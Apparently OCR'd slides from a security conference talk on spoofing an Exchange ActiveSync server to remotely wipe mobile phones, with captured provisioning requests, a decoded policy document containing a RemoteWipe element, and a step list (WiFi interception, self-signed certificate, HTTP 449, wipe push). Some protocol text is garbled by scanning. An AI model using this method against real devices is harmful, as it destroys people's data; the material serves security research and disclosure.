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Post pentest drinks with client 



... So if you own the active directory server 
what exactly can you do? 


The norm, control of every user, 
ability to push policy updates, etc... 



Exchange can remotely wipe devices, 
so why not that too? 
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Do we really need exchange for that 
though? 


Maybe we just send the phone those 
commands directly 

but... 
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THAT COULDN’T POSSIBLY WORK 
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It couldn’t be that easy could it? 


Surely SSL would prevent this if nothing 
else. 


Maybe it uses some sort of secure 
exchange, shared secrets, 
something... 
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I had a talk with a Microsoft Exchange 
admin type person... 


“It should work fine, as long as SSL is 
disabled” 


Damn.. Well, lets try it out anyway! 
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Let’s get some packet dumps of a legit 
wipe operation 


Exchange can’t be that hard to install 
right? I’ve done postfix & sendmail before 


Crap. 
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Packet Sniffing - Provisioning 


POST /Microsoft-Server-ActiveSync?Cmd=.&DeviceType=Android HTTP/1.1 

Content-Type: application/vnd.ms-sync.wbxml 

Authorization: Basic ZnVja2VyeS5mdWNrXGRpcnQ6cGFzc3dvcmQxMjMk 

MS-ASProtocolVersion: 12.0 

Connection: keep-alive 

User-Agent: Android/0.3 

X-MS-PolicyKey: 358347207 

Content-Length: 13 

Host: 192.168.1.218 



HTTP/1.1 449 Retry after sending a PROVISION command 

Cache-Control: private 

Content-Type: text/html 

Server: Microsoft-IIS/7.5 

MS-Server-ActiveSync: 14.0 

X-AspNet-Version: 2.0.50727 

X-Powered-By: ASP.NET 

Date: Tue, 08 May 2012 07:08:22 GMT 

Content-Length: 54 


The custom error module does not recognize this error. 
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POST /Microsoft-Server-ActiveSync?Cmd=Pnovision&User=.&DeviceType=Android HTTP/1.1 

Content-Type: application/vnd.ms-sync.wbxml 

Authorization: Basic ZnVja2VyeS5mdWNrXGRpcnQ6cGFzc3dvcmQxMjMk 

MS-ASProtocolVersion: 12.0 

Connection: keep-alive 

User-Agent: Android/0.3 

X-MS-PolicyKey: 0 

Content-Length: 41 

Host: 192.168.1.218 


..j...EFGH.MS-EAS-Provisioning-WBXML.HTTP/1.1 200 OK 

Cache-Control: private 

Content-Type: application/vnd.ms-sync.wbxml 
Server: Microsoft-IIS/7.5 
MS-Server-ActiveSync: 14.0 
Date: Tue, 08 May 2012 07:00:04 GMT 
Content-Length: 123 


..j...EK.l..FGH.MS-EAS-Provisioning-WBXML..K.l..1.2761868790..3MN.0..0.0..Q.0..P.0..S.l..T.4..U. 
900. . 

V.8...X.l...Z.0. 
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<Provision> 

<Status>l</Status> 

<Policies> 

<Policy> 

<PolicyType>MS-EAS-Provisioning-l/\IBXML</PolicyType> 

<Status>l</Status> 

<PolicyKey>2761868790</PolicyKey> 

<Data> 

<EASProvisionDoc> 

<DevicePasswordEnabled>0</DevicePasswordEnabled> 

<AlphanumericDevicePasswordRequired>0</AlphanumericDevicePasswordRGquired> 
<PasswordRecoveryEnabled>0</PasswordRecoveryEnabled> 

<DeviceEncryptionEnabled>0</DeviceEncryptionEnabled> 
attachmentsEnabled>l</AttachmentsEnabled> 

<MinDevicePasswordLength>4</MinDevicePassword Length> 
<MaxInactivityTimeDeviceLock>900</MaxInactivityTimeDevicel_ock> 
<MaxDevicePasswordFailedAttempts>8</MaxDevicePasswordFailedAttempts> 
<MaxAttachmentSize /> 

<AllowSimpleDevicePassword>l</AllowSimpleDevicePassword> 
<DevicePasswordExpiration /> 

<DevicePasswordHistory>0</DevicePasswordHistory> 

</EASProvisionDoc> 

</Data> 

</Policy> 

</Policies> 

<RemoteWipe /> 

</Provision> 
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<DevicePasswordEnabled>0</DevicePasswordEnabled> 

<AlphanumericDevicePasswordRequired>0</AlphanumericDevicePasswordRequired> 
<PasswordRecoveryEnabled>0</PasswordRecoveryEnabled> 

<DeviceEncryptionEnabled>0</DeviceEncryptionEnabled> 

<AttachmentsEnabled>l</AttachmentsEnabled> 

<MinDevicePasswordLength>4</MinDevicePasswordLength> 

<MaxInactivityTimeDeviceLock>900</MaxInactivityTimeDeviceLock> 

<MaxDevicePasswordFailedAttempts>8</MaxDevicePasswordFailedAttempts> 

<MaxAttachmentSize /> 

<AllowSimpleDevicePassword>l</AllowSimpleDevicePassword> 
<DevicePasswordExpiration /> 

<DevicePasswordHistory>0</DevicePasswordHistory> 

</EASProvisionDoc> 
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• WiFi is cool, phones have WiFi 

• ARP Poisoning 

• Pineapple 
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Step 1: Request 


Accept connection 

Use a shonky self signed SSL cert 
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Send HTTP error 449 
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Step 3: Wipe 


Send policy push containing wipe 
command 

Celebrate. 
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Oh no © 


Lets hope this works.... 


Did I chicken out and go with the 
recording? Lets see! 

(Boo or Cheer accordingly) 
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Compulsory OSS Project: Protocol 


• Emulate ActiveSync Protocol 

• Allow for projects to interact with mobile 
clients in new ways 

• Translation layer between exchange 
clients and other servers 

• Lots of things! 
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• Wouldn’t it be nice if we could get data 
back off the phones 

• Remote backup functionality 

• Sync features 

• Hopefully possible! 
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Lofty Goal: Ongoing Access 


• What sort of configuration options can we 
set? 

• Anything undocumented? 

• Can we reconfigure the device to 
point at another server? 
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• Brett Turner 

• Andrew Kitis 

• Rob McKnight 

• Randal Adamson 

• Sid 

• Murray Brand 

• Clinton Carpene 

• #nodavesclub 

• #cduc 

• ttkiwicon 
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THANKS FOR LISTENING 
ANY QUESTIONS? 


EMAIL: PETER@HANNAY.ID.AU 
TWITTER: @KRONICD 
WEBS: HTTP://OPENDUCK.COM 
















